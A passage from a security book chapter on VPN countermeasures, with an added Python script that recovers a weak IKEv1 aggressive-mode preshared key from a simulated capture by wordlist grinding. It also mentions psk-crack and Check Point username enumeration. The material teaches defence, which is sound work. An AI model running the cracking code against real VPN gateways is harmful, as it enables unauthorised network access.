11.5 VPN Services Countermeasures

  • Ensure that firewall and VPN gateway appliances have the latest security hotfixes and service packs installed, to minimize the risk that a known, publicized attack will succeed.

Here are IPsec-specific countermeasures:

  • Preshared keys used with both main mode and aggressive mode IKE key exchange are open to offline brute-force grinding attacks that compromise the shared secret. Aggressive mode is the worse case: the responder's authentication hash is sent in the clear, so a passive sniffer captures everything needed for the offline attack. Main mode sends the hash encrypted, so an attacker must be active (for example, answering as the gateway to a connecting client) to obtain the same material. Use digital certificates or two-factor authentication mechanisms to negate these risks.

  • Preshared keys combined with aggressive mode IKE are a recipe for disaster. If you must support aggressive mode IKE, use digital certificates for authentication.

  • Aggressively firewall and filter traffic flowing through VPN tunnels so that, in the event of a compromise, network access is limited. This point is especially important when providing network access to mobile users, as opposed to branch offices.

  • Where possible, limit inbound IPsec security associations to specific IP addresses. This ensures that even if an attacker compromises a preshared key, she can't easily access the VPN.
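
The following is an added example, not code from the original text, showing why the first two IPsec bullets matter: it reproduces the RFC 2409 preshared-key computation of HASH_R and then recovers a weak PSK from a sniffed aggressive mode exchange with a wordlist. The exchange values (cookies, nonces, DH public values, SA and ID payload bodies) are constructed in memory for illustration; a real attacker pulls them from a capture of the UDP/500 traffic.

```python
"""Offline preshared-key recovery from a sniffed IKEv1 aggressive mode exchange.

Added example, not code from the original page. The exchange below is
constructed in memory; a real attacker would pull these fields from a capture
of the UDP/500 traffic. The formulas are those of RFC 2409, section 5, for
preshared-key authentication, with prf = HMAC over the negotiated hash:
    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
In aggressive mode every input to HASH_R, and HASH_R itself, is sent in the
clear, so the only unknown is the PSK.
"""
import hmac
import os
from typing import Dict, Iterable, Optional


def prf(key: bytes, data: bytes, hash_name: str = "sha1") -> bytes:
    """IKEv1 prf: HMAC keyed with `key` over the negotiated hash (md5 or sha1)."""
    return hmac.new(key, data, hash_name).digest()


def hash_r(psk: bytes, ex: Dict[str, bytes], hash_name: str = "sha1") -> bytes:
    """HASH_R exactly as the responder (the VPN gateway) computes it."""
    skeyid = prf(psk, ex["ni"] + ex["nr"], hash_name)
    return prf(
        skeyid,
        ex["gxr"] + ex["gxi"] + ex["cky_r"] + ex["cky_i"] + ex["sai_b"] + ex["idir_b"],
        hash_name,
    )


def capture_aggressive_mode(psk: bytes, hash_name: str = "sha1") -> Dict[str, bytes]:
    """Return what a passive sniffer sees of an aggressive mode phase 1 exchange.

    Constructed data: cookies, nonces and DH public values are random bytes,
    because the attack never needs the DH private exponents. The SA payload
    body and the responder ID (ID_IPV4_ADDR, UDP/500, 203.0.113.1) are fixed
    placeholders standing in for the real payload bytes.
    """
    ex = {
        "cky_i": os.urandom(8),          # initiator cookie, message 1
        "cky_r": os.urandom(8),          # responder cookie, message 2
        "ni": os.urandom(20),            # initiator nonce, message 1
        "nr": os.urandom(20),            # responder nonce, message 2
        "gxi": os.urandom(128),          # initiator DH public value (group 2 size)
        "gxr": os.urandom(128),          # responder DH public value
        "sai_b": bytes.fromhex("00000001000000010000002801010000"
                               "800b0001800c0e10800100018002000280030001"),
        "idir_b": bytes([1, 17, 0x01, 0xf4, 203, 0, 113, 1]),
    }
    # Message 2 carries HASH_R unencrypted: this is the aggressive mode weakness.
    ex["hash_r"] = hash_r(psk, ex, hash_name)
    return ex


def crack_psk(ex: Dict[str, bytes], wordlist: Iterable[bytes],
              hash_name: str = "sha1") -> Optional[bytes]:
    """Offline grind: two HMACs per candidate, compared against the sniffed HASH_R."""
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate, ex, hash_name), ex["hash_r"]):
            return candidate
    return None


# Constructed wordlist; real attacks use large dictionaries plus mangling rules.
WORDLIST = [b"password", b"cisco123", b"vpn2004", b"letmein", b"Summer04!"]


def demo() -> Optional[bytes]:
    """Gateway configured with a weak PSK; attacker recovers it from one capture."""
    sniffed = capture_aggressive_mode(b"letmein")
    return crack_psk(sniffed, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

Main mode carries HASH_I and HASH_R inside the encrypted payloads of messages 5 and 6, so a passive sniffer never sees the value this script compares against; the same grind is possible against main mode only for an attacker who can answer as the gateway and so knows the Diffie-Hellman result. Note that nothing in the loop is expensive: each candidate costs two HMAC operations, which is why a PSK chosen from a dictionary survives minutes, not months. The psk-crack utility shipped with ike-scan performs this computation against real captures.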

Here are Check Point Firewall-1 and NG-specific countermeasures:

  • Filter access to TCP ports 256 and 264 if they aren't required for remote access through SecuRemote, SecureClient, or similar VPN client software. These ports can be abused to collect user and network topology information.

  • Check Point Firewall-1 and NG are open to an active attack that enumerates valid usernames through aggressive mode IKE. If possible, disable aggressive mode support.

  • If you use FWZ VPN tunnels, ensure that the latest Check Point service pack and any relevant security hotfixes are installed to negate known circumvention techniques. Because FWZ's RDP (Check Point's Reliable Data Protocol, not Microsoft's Remote Desktop Protocol) runs over UDP, the service is susceptible to various spoofing and encapsulation attacks.